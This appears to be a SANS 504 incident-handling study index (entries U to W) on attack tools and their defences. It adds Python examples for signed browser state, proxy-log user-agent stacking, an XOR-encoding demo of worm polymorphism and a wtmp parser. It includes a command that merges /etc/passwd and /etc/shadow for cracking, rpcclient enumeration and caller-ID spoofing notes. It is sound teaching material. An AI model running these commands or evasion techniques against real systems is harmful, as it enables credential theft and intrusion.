
unshadow 4 35 Command used to run John on a machine with shadowed passwords.
# unshadow /etc/passwd /etc/shadow > combined
Unusual Accounts (Windows Cheat Sheet) 1 71 Look for new, unexpected accounts in Admin group (C:\> lusrmgr.msc)

Unusual Files (Windows Cheat Sheet) 1 72 Check file space usage for sudden major decreases in space. Use GUI or type C:\> dir c:
Look for files larger than 10 MB: C:\> FOR /R C:\ %i in (*) do @if %~zi gtr 10000000 echo %i %~zi

Unusual Log Entries (Windows Cheat Sheet) 1 74 Look for indications that the event log service was stopped. Look for a sign that Windows file integrity checker was disabled or a sign that Microsoft Telnet service has been invoked

Unusual Network Usage (Windows Cheat Sheet) 1 66 netstat -na, netstat -na 5, netstat -nao 5

Unusual Processes (Windows Cheat Sheet) 1 67 tasklist, wmic process list full, wmic process get name
Unusual Reg Key Entries (Windows Cheat Sheet) 1 69 At the command line, reg query can also be used to query the values of these settings
C:\> reg query hklm\software\microsoft\windows\currentversion\run

Unusual Scheduled Tasks (Windows Cheat Sheet) 1 73 Look at scheduled tasks on the local host by running C:\> schtasks

Unusual Services (Windows Cheat Sheet) 1 68 Several commands can be used to check for unusual services, such as services.msc, net start, tasklist /svc, sc query | more
URL Encoding 2 Nikto converts an HTTP request into a different representation, by changing ASCII characters into their hexadecimal values and prepending them with a % character.
- GET /%63%67%69%2d……./broken.cgi HTTP/1.0
URLsnarf 2 68 Captures all URLs from HTTP traffic
Use PAM to Enforce Password Complexity 4 41 Pluggable Authentication Modules (PAM)
Can link UNIX login to various systems:
-RADIUS, Kerberos, and more
Can enforce password complexity

Using Samba RPC Client from Linux For More Info 2 142 $ rpcclient -U [username] [WinIPaddr]  establish a session
You have an rpcclient prompt with many commands available
- enumdomusers: List users
- enumalsgroups [domain]|[builtin]: List groups (stands for "enum alias groups")
- lsaenumsid: Show all users' SIDs defined on the box
- lookupnames [name]: Show SID associated with user or group name
- lookupsids [sid]: Show user name associated with SID
- srvinfo: Show OS type and version
The rpcclient man page lists hundreds of other commands
- Those listed here are the most useful and a lab covers them shortly
utmp file - Accounting Entries in UNIX 5 84 utmp: File contains info about currently logged in users
-Default location on Linux: /var/run/utmp
Uwhois 2 20 Another useful source of whois that supports domain name registration lookups for more than 246 countries.
Validation (Recovery) 1 122 Safely put the impacted systems back into production
- Verify proper operation and continue to monitor
- Review baseline docs and conduct systems tests by procedure

Version scanning 2 94 Tries to determine the version number of the program listening on a discovered port, for both TCP and UDP

Virtual Network Computing (VNC) Overview 5 10 VNC is free, popular, and quite feature rich. It uses TCP port 5900 to send a GUI across the network
VNC's default security is problematic. It does include a password, but has been subject to monkey-in-the-middle and buffer overflow attacks in the past.
Flexible cross-platform remote access suite
--Can be used for legit remote admin
----If you use VNC for admin, we recommend you carry that access across a secure, encrypted session, such as SSH or encrypted VPN
GUI across the network
--Included in the Metasploit payload arsenal
Most anti-virus tools do not detect it, because of its legit uses
Virus 4 56 A defining characteristic of a virus is that it infects a host file, such as a document, e-mail, or executable.
VM Detection 4 77 Malware detects VM and may run differently if present
--Helps confuse malware reverse engineering
--It's also useful for attackers to find honeypots
--may lead to virtual machine escape

VM Detection - Process 4 78 Look for VME artifacts in processes
Look for VME artifacts in memory
Look for VME-specific virtual hardware
Look for VME-specific processor instructions and capabilities

VM Escape 4 79 VMs have specific hardware, registry, networking entries that we ID
Vmcat
Escape allows an attacker to execute code on the host
--can control the hypervisor, seize shared resources for all VMs
VM Escape: Defenses 4 80 Maintain patches, separate systems by sensitivity
--be careful about which systems share resources
Vmcat 4 79 Vmcat implements netcat-like functionality without using the network. Instead, it directs standard in and standard out between a process on the guest machine and a process on the host.
Vmware Machines 1 196 - .vmx = Virtual machine's configuration
- .nvram = Stores the state of the virtual machine's BIOS
- .vmdk = Stores the virtual disk file, the hard drive image(s) of the virtual machine
- .vmss = Suspended state file, for a paused virtual machine
- .vmsn = Snapshot file, used for taking a snapshot of the system state for restoring it later

VNC Overview 5 10-13 Flexible, cross-platform remote access suite
- Can be used for legit remote admin
**Only use in a secure, encrypted session (SSH or encrypted VPN)
--Most anti-virus tools don't detect it, because of its legit uses

VNC Platforms 5 11 Huge platform support with interoperability
--Windows
--Linux
--Solaris
--HP-UX 11
--Mac OS X
Client or server on each of these platforms
Windows can control UNIX and vice versa
VNC is also a very useful Metasploit payload
VNC: Active Client and Listening Client 5 12 The VNC client can run in two modes:
--Active connection to server listening on a port (TCP 5900 by default)
--Listening mode, waiting for server to send a connection to the client - "Shoveling" GUI!!
----When configured to listen, client uses TCP 5500 by default
TCP 5800 just serves up a Java applet of a VNC viewer
VSAgent 5 132, 133 Covert channel backdoor with encoded C2 (base64)
--inserts into the __VIEWSTATE parameter
The encoded data is sent in the clear
Very difficult to detect
Vulnerability Analysis (Eradication) 1 120 Perform vulnerability analysis
- Perform system/network vulnerability analysis
--Conduct a port scan
Vulnerability scanners: Nessus, OpenVAS, NeXpose, and Qualys

Vulnerability Scanners 2 115 Test against a list of known exploits
-Nessus, OpenVAS, NeXpose, SAINT, Retina, Foundscan, Qualys

Vulnerability Scanners - Defense 2 121 Preparation:
--Close all unused ports, shut off all unneeded services
----In Windows, stop or delete services in the Services control panel
----In UNIX, edit /etc/inetd.conf or /etc/xinetd.d files, as well as rc.d files (chkconfig)
--Apply all system patches, run credentialed scans of your environment
Identification:
--Utilize intrusion detection system (IDS) signatures
--Most vulnerability scanners trip hundreds of signatures
Cont, Erad, Rec: N/A
War Dialers 2 53 Dial a sequence of telephone numbers, attempting to locate modem carriers or a secondary dial tone
Demon dialers: dial a single number to conduct a brute-force attack against passwords
Often an unprotected modem provides the easy method for accessing routing and switching components
War Dialing: Defenses 2 57 Defense: conduct self-scanning/remediation (pg 57-58)
War Driving 2 60 Scanning for open/misconfigured WAPs that can be exploited
-InSSIDer, NetStumbler

War Driving: CoWPAtty 2 65 Josh Wright has released a tool called CoWPAtty
A dictionary-based cracking tool for pre-shared keys with WPA1 and WPA2
Must sniff four-way handshake
Cryptographically, WPA is a complex protocol
- On a modern laptop, crypto routines can try between 10 and 50 guess/encrypt/compares per second
Thus, pre-computed encrypted dictionaries are a big help... But, WPA folds SSID into its cryptographic exchange
Pre-computed dictionaries are available for
- The 1000 most common SSIDs (Linksys, tsunami, for example) with 172,000 passwords for >7 Gigs
- The 1000 most common SSIDs with 1 million words for >33 Gigs
Warhol/Flash Technique 4 62 Prescan large portions of the Internet, looking for 10,000 or so vulnerable systems. After compromising the initial 10,000 hosts, normal scanning ensues
Warning Banners 1 21 Establish policy and warning banners
--Warning banners limit the presumption of privacy
--Access to the system is limited to company-authorized activity
--Any attempt at or unauthorized access, use, or modification is prohibited
--Unauthorized users may face criminal or civil penalties
--The use of the system may be monitored and recorded
--If the monitoring reveals possible evidence of criminal activity, the company can provide the records to law enforcement
Have a legal team review this banner, approving it in writing
--Be careful of local privacy laws, especially in Europe
--European Data Privacy Directives may impact that crucial line

Warning Banners (Insider Threat) 1 173 Required if monitoring may lead to disciplinary action or prosecution
- That access to the system is limited to company-authorized activity
- That any attempted or unauthorized access, use, or modification is prohibited
- That unauthorized users may face criminal or civil penalties
- That the use of the system may be monitored and recorded
- That if the monitoring reveals possible evidence of criminal activity, the company can provide the records to law enforcement
**Verify wording with legal staff, and be careful with European Data Privacy Directives

WarVOX 2 54 War dials from VoIP accounts, 1k+ per hour
-can spoof caller ID
Conducts war dialing using one or more VoIP accounts
--No telephony hardware required, just an Internet connection and a VoIP account
----Provider must support IAX protocol
----Several compatible VoIP providers that do not prohibit war dialing are listed on the WarVOX website
--Traditional modem-based war dialing: 1,000 numbers in approx. 8 hours
--WarVOX war dialing: 1,000 numbers per hour
A significant increase in speed
Supports caller ID spoofing
--Enter a single number for all calls dialed
--Enter a variable number of Xs for pseudo-random source number
--Enter SELF to make caller ID same as dialed number, may bypass PIN authentication in some voicemail systems
List of UserIDs for login guessing on pg 56
Waste 4 Another method for bot communication involves using a distributed protocol called Waste. Originally created by AOL
Wayback 2 39 The Wayback Machine is a thorough view, with multiple images over time

Web App - Proxy: Defense (Book 4, pp. 143-144)
Preparation:
--Carefully test every variable
--A single unprotected variable can be manipulated and compromise the system
--Implement a WAF:
----SecureSphere Web App Firewall
----Citrix NetScaler App Firewall
----F5 Application Security Manager (ASM)
----Free OWASP Stinger
----Free ModSecurity offers similar protections, although it is not a proxy
Identification:
--Users complaining of account usurpation
Containment:
--Strongly advise shutting down the app while it gets fixed. Otherwise, quarantine accounts that have fallen victim
Eradication:
--Remove the attacker's data from victim accounts
Recovery:
--Carefully restore accounts and reset passwords for victim users. Monitor these accounts carefully

Web App Attack Proxies (Numerous Tools) (Book 4, p. 139)
ZAP Proxy, Burp Proxy, w3af, and Fiddler
Web App Firewall (WAF) (Book 4, p. 143)
SecureSphere Web App Firewall
Citrix NetScaler App Firewall
F5 Application Security Manager (ASM)
Free OWASP Stinger
Free ModSecurity offers similar protections, although it is not a proxy

Web App Manipulation Proxy Architecture (Book 4, p. 138)
The proxy enables the attacker to edit the raw HTTP or HTTPS, including nonpersistent cookies
-You can view and edit anything that is passed to the browser, such as account numbers, balances, and shopping cart prices
Web App Proxy (Book 4, p. 138)
ZAP Proxy, Burp Proxy, w3af, and Fiddler
The proxy enables the attacker to edit the raw HTTP or HTTPS, including nonpersistent cookies
Web Application Attack and Audit Framework (W3AF) (Book 4, p. 139)
Includes numerous features, implemented in Python, including a man-in-the-middle proxy for manipulating web applications

Web Application Defenses (Book 4, p. 144)
Identification: Users complaining of account usurpation. Containment: Strongly advise shutting down the app while it gets fixed; otherwise, quarantine accounts that have fallen victim. Eradication: Remove the attacker's data from victim accounts. Recovery: Carefully restore accounts and reset passwords for victim users. Monitor these accounts carefully

Web Application Proxy: Defenses (Book 4, p. 142)
Carefully test every variable
--A single unprotected variable can be manipulated and compromise the system
-Implement a Web Application Firewall
Web Based Recon: Attack Tools (Book 2, p. 50)
Shodan, DNSStuff, tracert, traceroute, network-tools, securityspace
- All are able to research target sites and provide info about the network and its vulnerabilities
Web Inputs (Book 4, pp. 141-142)
You can view and edit anything that is passed to the browser
Any variable passed to the browser can be altered by the user unless the application performs integrity checks
Sometimes 99.99% of all state information in an application is covered
But on one screen, a single variable is passed in the clear without a hash or timestamp
With just one piece of unprotected state, the application is vulnerable
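Added example for the Web Inputs entry above (not code from the SANS 504 material): the "hash or timestamp" the entry refers to, done properly. State that must round-trip through the browser is serialized, time-stamped and HMAC-signed on the server; on the way back the MAC is checked in constant time before anything in the token is trusted, and stale tokens are rejected. The secret, the field names, the token layout and the 10-minute lifetime are illustrative assumptions. tamper_price() plays the role of the proxy user who rewrites a price field.

```python
"""Integrity-protecting state that must round-trip through the browser.

Added example for the "Web Inputs" entry; not code from the SANS 504
material. The secret, field names, token layout and the 10-minute
lifetime are illustrative assumptions.
"""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

SECRET = b"server-side-only-key-rotate-me"  # assumption: never leaves the server
MAX_AGE_SECONDS = 600                       # assumption: a token is good for 10 minutes


def _mac(message: bytes, secret: bytes) -> str:
    """HMAC-SHA256 over the exact bytes the browser will hand back."""
    return hmac.new(secret, message, hashlib.sha256).hexdigest()


def sign_state(fields: dict, secret: bytes = SECRET, now: Optional[float] = None) -> str:
    """Return a token for a hidden field or cookie: <b64(json)>.<timestamp>.<mac>.

    Sorting the keys makes the JSON canonical, so the same fields always
    produce the same bytes under the MAC.
    """
    ts = str(int(time.time() if now is None else now))
    body = base64.urlsafe_b64encode(json.dumps(fields, sort_keys=True).encode()).decode()
    return f"{body}.{ts}.{_mac(f'{body}.{ts}'.encode(), secret)}"


def verify_state(token: str, secret: bytes = SECRET, now: Optional[float] = None,
                 max_age: int = MAX_AGE_SECONDS) -> Optional[dict]:
    """Return the fields if the token is authentic and fresh, otherwise None.

    The MAC is checked before anything in the token is trusted (including
    the timestamp), and with a constant-time comparison.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    body, ts, mac = parts
    if not hmac.compare_digest(mac, _mac(f"{body}.{ts}".encode(), secret)):
        return None
    age = (time.time() if now is None else now) - int(ts)
    if age < 0 or age > max_age:
        return None  # replayed too late, or a timestamp from the future
    return json.loads(base64.urlsafe_b64decode(body))


def tamper_price(token: str, new_price_cents: int) -> str:
    """What a proxy user does: rewrite the price field, keep the timestamp and MAC."""
    body, ts, mac = token.split(".")
    fields = json.loads(base64.urlsafe_b64decode(body))
    fields["price_cents"] = new_price_cents
    forged = base64.urlsafe_b64encode(json.dumps(fields, sort_keys=True).encode()).decode()
    return f"{forged}.{ts}.{mac}"


if __name__ == "__main__":
    t0 = 1_700_000_000
    token = sign_state({"item": "SKU-1", "price_cents": 4999}, now=t0)
    print("genuine :", verify_state(token, now=t0 + 30))
    print("tampered:", verify_state(tamper_price(token, 1), now=t0 + 30))
    print("expired :", verify_state(token, now=t0 + 601))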
Web Proxies (Unauthorized Use) (Book 1, p. 170)
Block access to such sites with proxies:
-WebSense
-Blue Coat
- By stopping 90% of the problem, it allows handlers to focus on the remaining 10% and other sensitive issues
Web proxies may not have the most current blacklists
Web Proxy Data (Enterprise-Wide IR) (Book 1, p. 134)
-Review for odd URLs and compare to other indicators
-Review user agent strings
- Many malware specimens use older or odd user agent strings
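Added example for the Web Proxy Data entry above (not code from the SANS 504 material): the user-agent review done as a stacking exercise. Each user-agent string is counted by the number of distinct clients that present it, so rarity itself becomes the signal, and a short list of legacy patterns catches the "older or odd" strings the entry mentions. The destinations reached with those agents are then the URLs to compare against other indicators. The log format, the sample lines and the legacy patterns are constructed for this example.

```python
"""Stacking user-agent strings in web proxy logs to surface odd clients.

Added example for the "Web Proxy Data (Enterprise-Wide IR)" entry; not
code from the SANS 504 material. The log format and sample lines are
constructed, and the "legacy" patterns are an illustrative starting list.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed sample: <time> <client> <destination> <status> "<user-agent>"
SAMPLE_LOG = """\
2024-05-01T08:00:01Z 10.1.1.20 www.example.com 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T08:00:02Z 10.1.1.21 www.example.com 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T08:00:05Z 10.1.1.22 cdn.example.net 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T08:00:09Z 10.1.1.23 www.example.com 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
2024-05-01T08:01:17Z 10.1.1.57 update-check.example.org 200 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
2024-05-01T08:01:18Z 10.1.1.57 update-check.example.org 200 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
2024-05-01T08:02:44Z 10.1.1.88 203.0.113.9 200 "-"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "(.*)"$')

# Illustrative patterns for user agents that no current browser sends.
LEGACY_UA_PATTERNS = [
    re.compile(r"MSIE [4-8]\."),         # Internet Explorer 4-8
    re.compile(r"Windows NT 5\.[012]"),  # Windows 2000 / XP / Server 2003
    re.compile(r"^Mozilla/4\.0 "),       # IE-era Mozilla token
]


def parse_proxy_log(text: str) -> List[Dict[str, str]]:
    """Turn raw lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, client, dst, status, ua = m.groups()
            records.append({"ts": ts, "client": client, "dst": dst, "status": status, "ua": ua})
    return records


def clients_per_user_agent(records) -> Dict[str, Set[str]]:
    """Stack: which distinct clients present each user-agent string."""
    stacked = defaultdict(set)
    for r in records:
        stacked[r["ua"]].add(r["client"])
    return stacked


def rare_user_agents(records, max_clients: int = 1) -> Set[str]:
    """User agents seen from at most max_clients hosts; the rarity is the signal."""
    return {ua for ua, clients in clients_per_user_agent(records).items() if len(clients) <= max_clients}


def legacy_or_empty_user_agents(records) -> Set[str]:
    """User agents that are blank or match a known-legacy pattern."""
    flagged = set()
    for r in records:
        ua = r["ua"]
        if ua in ("", "-") or any(p.search(ua) for p in LEGACY_UA_PATTERNS):
            flagged.add(ua)
    return flagged


def suspicious_destinations(records, max_clients: int = 1) -> Set[str]:
    """Destinations reached with a rare or legacy user agent: compare these against other indicators."""
    odd = rare_user_agents(records, max_clients) | legacy_or_empty_user_agents(records)
    return {r["dst"] for r in records if r["ua"] in odd}


if __name__ == "__main__":
    recs = parse_proxy_log(SAMPLE_LOG)
    for ua, clients in sorted(clients_per_user_agent(recs).items(), key=lambda kv: len(kv[1])):
        print(f"{len(clients):3d} client(s)  {ua}")
    print("suspicious destinations:", sorted(suspicious_destinations(recs)))
```

On a real proxy export, raise max_clients to a small fraction of the fleet; a user agent on two hosts out of ten thousand is still worth a look.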

Web Scanners (Book 2)
-Automated program that scans sites looking for known, vulnerable material
-Looks for specific script names that are known to have problems
-Very basic
-Sometimes called web/CGI scanners
WebGoat 4 82 WebGoat: A buggy web app, ready for you to test
webmitm (Book 3, p. 57) Dsniff tool for man-in-the-middle interception of HTTPS sessions, used together with dnsspoof

Website Searches: Defenses (Book 2, p. 33)
Preparation:
--Limit and control information
--Know what information the company is giving away and perform a risk analysis
--Make employment ads more general, if HR lets you
--Limit information on the website
--Determine what other sites are linked to your company
Identification:
--Look for web spider/crawler activity
----Logs show systematic access of the entire website, page by page
----"Someone just sucked down the entire contents of our site"
Cont, Erad, Recov: N/A
WebSpy (Book 3, p. 53) Sends sniffed URLs from Dsniff to the attacker's browser, which then shows the pages the target is surfing in real time
WEPCrack 2 64 Crack WEP keys

Whois (Book 2, p. 19)
Whois databases contain a treasure trove of information
--Many can be accessed via the web
--Alternatively, use the "whois" command built into many UNIX implementations
--Used to gather contact names, DNS information, and other data
First, look up the target at InterNIC to determine the registrar
--www.internic.net/whois.html
--Operated by the Internet Corporation for Assigned Names and Numbers (ICANN)
Then, go to the registrar's whois database to get detailed records
--For example, http://www.networksolutions.com/whois/index.jsp

Whois: Defenses (Book 2, p. 22)
Preparation:
--Just live with it
--Use an organization name or title with a real email and phone number
--Keep records up to date
--Be wary of anonymous registration agents
Identification:
--You can't tell if someone has looked you up
Cont, Erad, Recov: N/A

Whois: Research IP Blocks (Book 2, p. 20)
Attackers look for IP address assignments in these regional whois databases:
--ARIN (American Registry for Internet Numbers)
--RIPE NCC (Réseaux IP Européens Network Coordination Centre)
--APNIC (Asia Pacific Network Information Centre)
--LACNIC (Latin American and Caribbean NIC)
--AFRINIC (Africa's NIC)
--DoDNIC (Department of Defense NIC)
After getting registration information, an attacker may also want to see if any IP address blocks are assigned to the target.
Many organizations don't have their own IP address allocation; they get addresses from their ISPs
Whois: Sample 2 21 see screenshot
Windows - Additional Supporting Tools (Book 1, p. 76)
TCPView: map listening TCP/UDP ports to processes
Process Explorer and Process Monitor: process-analysis tools
Hardening Guides: Center for Internet Security templates and scoring tools
Windows Cheat Sheet (Book 1, p. 63)
Winsacheatsheet_2.0.pdf is the latest version. It applies to Windows XP Pro up to Windows 10. Older machines use v1.4
Windows Delimiter (Book 2) Attacks Windows boxes. Instead of using a forward slash (/) as the RFC requires, an attacker can use a backslash (\) as the path delimiter
Windows User-Mode Rootkit: DLL Injection and API Hooking (Book 5, p. 51)
EXEs and DLLs are commonly used methods for packaging code in Windows
--EXEs run and utilize shared DLLs to get work done
On Windows, anyone with the Debug right can inject a DLL into a running process and start it running by creating a thread in the target process
Hook APIs to change programs' views of running processes, open ports, and the file system
winrtgen.exe (Book 4, p. 27) Tool shipped with Cain that allows the attacker to generate rainbow tables

WinVNC (Book 5, p. 13)
Server can run in two modes:
--App mode (shows up in the tool tray)
--Service mode (shows up in the service list and in the tool tray after reboot)
--There is a config option to hide the tool tray icon

Wireless Defense (Book 2, pp. 72-75)
Preparation:
--MAC address filtering at the access point isn't secure
--Set the SSID so that it doesn't attract attention
--Use WPA2 with a strong password
----Recommended 21 characters long
--Protect client wireless configs
--Use layer 3 encryption to bolster or even supplant layer 2 encryption
----Use a VPN
----All data from the end system to the VPN gateway inside the wireless device is encrypted and authenticated
--Be careful with wireless VPN config
Identification:
--Wireless IDS tools are starting to get some traction
--Aruba Networks, Motorola AirDefense, AirMagnet, and others offer products
Cont, Erad, Recov:
--Remove rogue access points

Wireless Misconfigurations: War Driving (Book 2, p. 60)
Many wireless access points (base stations) are configured with no security
--Blank or default SSIDs are common
By default, most access points broadcast beacon packets with their SSID 10 times per second
Even for APs configured not to include the SSID in beacons (SSID cloaking), SSIDs are still sent in clear text whenever anyone uses the wireless LAN

Wireless Sniffing (Book 2, p. 64)
Utilize a traditional sniffer to gather wireless packets
- tcpdump, Wireshark, and more
Or use a wireless-specific sniffer for better analysis of wireless-specific frame data
--OmniPeek (commercial)
Aircrack-ng and WEPCrack crack WEP keys
ASLEAP by Josh Wright provides a dictionary attack against LEAP
Wireshark 3 46 Powerful Multipurpose Protocol Analyzer
WMIC (Enterprise-Wide IR) (Book 1, p. 137)
Third-party tools not required; the integrated tool can pull from across the network
C:\> wmic product get name, version
C:\> wmic /node:@systems.txt product get description, name, vendor /format:csv > SoftwareInventory.txt
**csv or xml format

WordWebBugs (Book 1, p. 106)
You could also use WordWebBugs to track the attacker
-These documents call back (preferably to a non-attributable system) so you can identify where your sensitive data is
-They are built into the Active Defense Harbinger Distribution

Worm and Bots: Defenses (Book 4, p. 75)
Preparation:
--Buffer overflow defenses help a lot here:
----Patches, non-executable system stacks, and host-based IPS
--A process for rapidly testing and deploying patches when available
--Use application whitelisting or Software Restriction Policies/AppLocker
--Encrypt data on the hard drive
Identification:
--Antivirus solutions updated regularly
Containment:
--Incident response capabilities, linked with network management
--May need to cut off segments of your network in real time
Eradication/Recovery:
--Use an AV tool to remove the infestation, if possible, or rebuild
Summary: patch, app whitelisting, encryption, AV; implement layered monitoring systems

Worm History (Book 4, p. 56) SQL Slammer, Blaster, Stuxnet, Conficker, etc. (view slide)
Worms (Book 4, p. 55)
Worms automate the process of compromising systems:
--Take over one system, then scan for and spread to new systems
Each instance of a worm is a "segment"


Worms: Fast / Fast Spreading (Book 4, p. 61)
August 2001: two methods proposed to increase initial infection, i.e., new techniques to maximize the speed at which worms spread
Warhol worm and Flash worm
--Mathematical models, not code
--Warhol: 99% infection rate in 15 minutes
--Flash: 99% infection rate in 30 seconds
--A bit overstated; it would take approximately 1 hour
**Prescan for vulnerable hosts, preload targets
Technique used by the Carna botnet
Worms: Metamorphic (Book 4, p. 66)
Beyond changing their appearance, these worms change their entire functionality
Contain encrypted/obfuscated payloads
After an event occurs (time duration, infection rate, or other trigger), the worm morphs by decoding the hidden functionality

Worms: Multi-Exploit (Book 4, p. 58) Worms are becoming more complex and use several exploits at once
If you've patched against N-1 vulnerabilities, the worm will still get in through hole N

Worms: Polymorphic (Book 4, pp. 63-64)
Worms so far have done an excellent job of evading detection:
--Alter the subject line to assist in spam filter evasion
Polymorphism (dynamically changing):
--Each segment of the worm has the same function
--The code base changes, making detecting and isolating the worm difficult
--Detection and filtering signatures no longer match as the worm morphs
Method described on p. 64
Solid polymorphic code engines are available:
--Viruses have been polymorphic for years
--HD Moore's XOR payloads and encoders (www.metasploit.com)
--Veil has multiple AV bypass encoders
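Added example for the Worms: Polymorphic entry above (not code from the SANS 504 material, Metasploit or Veil): the simplest form of what an XOR encoder does, and why a static byte signature stops matching. Every copy of the "segment" is XOR-encoded with a fresh one-byte key, so the bytes on the wire differ per copy while the decoded function is identical; the last function shows the defender's answer to single-byte XOR, which is to brute-force the key and match the signature after decoding. The payload is a constructed byte string standing in for a worm body, and the signature is an assumed detection substring.

```python
"""Why a byte signature stops matching once a payload is XOR-encoded with a fresh key.

Added example for the "Worms: Polymorphic" entry; not code from the SANS 504
material, Metasploit or Veil. PAYLOAD is a constructed stand-in for a worm
segment's body and SIGNATURE an assumed detection substring.
"""
import os
from typing import Tuple

PAYLOAD = b"SEGMENT: scan 10.0.0.0/8, exploit port 445, copy self"   # constructed
SIGNATURE = b"exploit port 445"   # the substring a static detection rule keys on


def xor_encode(payload: bytes, key: int) -> bytes:
    """Encode with a one-byte key; a different key yields different bytes for the same payload."""
    if not 0 < key < 256:
        raise ValueError("key must be 1..255 (0 would leave the payload in the clear)")
    return bytes(b ^ key for b in payload)


def xor_decode(blob: bytes, key: int) -> bytes:
    """XOR is its own inverse: the decoder stub carried with the payload just runs this."""
    return xor_encode(blob, key)


def make_variant(payload: bytes = PAYLOAD) -> Tuple[int, bytes]:
    """What a polymorphic engine does per copy: pick a fresh key, emit a new-looking body."""
    key = 1 + os.urandom(1)[0] % 255
    return key, xor_encode(payload, key)


def signature_hits(blob: bytes, signature: bytes = SIGNATURE) -> bool:
    """Static rule: does the signature appear verbatim in the bytes on the wire?"""
    return signature in blob


def recover_key_by_brute_force(blob: bytes, signature: bytes = SIGNATURE) -> int:
    """Defender's answer to single-byte XOR: try every key, match the signature after decoding (0 = no hit)."""
    for key in range(1, 256):
        if signature in xor_decode(blob, key):
            return key
    return 0


if __name__ == "__main__":
    for _ in range(3):
        key, variant = make_variant()
        print(f"key={key:3d} signature on wire={signature_hits(variant)!s:5} "
              f"recovered key={recover_key_by_brute_force(variant)}")
```

Real encoders use multi-byte or rolling keys and vary the decoder stub itself, which is why the signature has to move from the bytes on the wire to the behaviour the segment exhibits.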
Worms: Zero-Day Exploit (Book 4, p. 60) Worms that utilize brand-new exploits for which no patches are available. Stuxnet provided an example of zero-day exploits in worms.

WPAD: Attacking (Book 3, p. 74)
Web Proxy Auto-Discovery: a system automatically attempts to find a host named WPAD and download a PAC file with proxy settings
--Tools: MITMf and Responder
Intercept traffic for specific domains (think PAC backdoors) and harvest full HTTPS URL information for things like session IDs
Pacdoor is a tool that attacks WPAD

Wrappers (Book 5, p. 18)
Wrap a backdoor tool around some other application, AKA binders
Create a Trojan horse executable
Built into many backdoors (Poison Ivy) and Metasploit msfvenom
Can wrap into .VBS or .VBA for macros in Word and Excel with exe2vba.rb and exe2vbs.rb
The Veil toolkit uses some of these techniques to bypass AV
SET's default payload generation also does this
wtmp file (Book 5, p. 84) wtmp: file contains data about past user logins
-Default location on Linux: /var/log/wtmp
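Added example for the wtmp file entry above (not code from the SANS 504 material): a parser for the binary records in /var/log/wtmp, which is what you need when `last` is not trusted on a compromised host or the file has been copied off for analysis. It assumes the glibc struct utmp layout used on x86_64 Linux (384-byte little-endian records); other architectures and libcs differ. The records are constructed in build_record() so the example runs offline; the business-hours window is an illustrative triage assumption.

```python
"""Parsing Linux wtmp records to reconstruct past logins.

Added example for the "wtmp file" entry; not code from the SANS 504 material.
Assumes the glibc struct utmp layout on x86_64 Linux (384-byte little-endian
records). Sample records are constructed, not read from a real file.
"""
import struct
from datetime import datetime, timezone
from typing import Dict, List

# glibc x86_64 struct utmp: ut_type, pad, ut_pid, ut_line[32], ut_id[4], ut_user[32],
# ut_host[256], ut_exit{e_termination, e_exit}, ut_session, ut_tv{sec, usec},
# ut_addr_v6[4], unused[20]
UTMP_FORMAT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FORMAT)  # 384 on the assumed layout

UT_TYPES = {0: "EMPTY", 1: "RUN_LVL", 2: "BOOT_TIME", 3: "NEW_TIME", 4: "OLD_TIME",
            5: "INIT_PROCESS", 6: "LOGIN_PROCESS", 7: "USER_PROCESS", 8: "DEAD_PROCESS",
            9: "ACCOUNTING"}
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8


def _cstring(raw: bytes) -> str:
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_wtmp(data: bytes) -> List[Dict]:
    """Decode every complete record; a trailing partial record is ignored."""
    records = []
    for offset in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        (ut_type, pid, line, ident, user, host, _term, _exit, _session,
         tv_sec, _tv_usec, *_rest) = struct.unpack_from(UTMP_FORMAT, data, offset)
        records.append({
            "type": UT_TYPES.get(ut_type, str(ut_type)),
            "pid": pid,
            "line": _cstring(line),
            "id": _cstring(ident),
            "user": _cstring(user),
            "host": _cstring(host),
            "time": datetime.fromtimestamp(tv_sec, tz=timezone.utc),
        })
    return records


def login_sessions(records) -> List[Dict]:
    """Pair each USER_PROCESS with the next DEAD_PROCESS on the same tty; open sessions have end=None."""
    open_by_line: Dict[str, Dict] = {}
    sessions = []
    for r in records:
        if r["type"] == "USER_PROCESS":
            session = {"user": r["user"], "host": r["host"], "line": r["line"], "start": r["time"], "end": None}
            open_by_line[r["line"]] = session
            sessions.append(session)
        elif r["type"] == "DEAD_PROCESS" and r["line"] in open_by_line:
            open_by_line.pop(r["line"])["end"] = r["time"]
    return sessions


def logins_outside_hours(sessions, start_hour: int = 7, end_hour: int = 19) -> List[Dict]:
    """Sessions that began outside the assumed business window (UTC); a triage filter, not proof of anything."""
    return [s for s in sessions if not (start_hour <= s["start"].hour < end_hour)]


def build_record(ut_type: int, pid: int, line: str, ident: str, user: str, host: str, tv_sec: int) -> bytes:
    """Construct one record for the sample data below (real data comes from /var/log/wtmp)."""
    return struct.pack(UTMP_FORMAT, ut_type, pid, line.encode(), ident.encode(), user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0, b"")


BOOT = 1_714_550_400  # 2024-05-01 08:00:00 UTC (constructed)
SAMPLE_WTMP = b"".join([
    build_record(BOOT_TIME, 0, "~", "~~", "reboot", "6.1.0-generic", BOOT),
    build_record(USER_PROCESS, 4242, "pts/0", "ts/0", "alice", "10.0.0.5", BOOT + 900),
    build_record(DEAD_PROCESS, 4242, "pts/0", "ts/0", "", "", BOOT + 4500),
    build_record(USER_PROCESS, 5151, "pts/1", "ts/1", "root", "203.0.113.7", BOOT + 19 * 3600),  # 03:00 UTC next day
])

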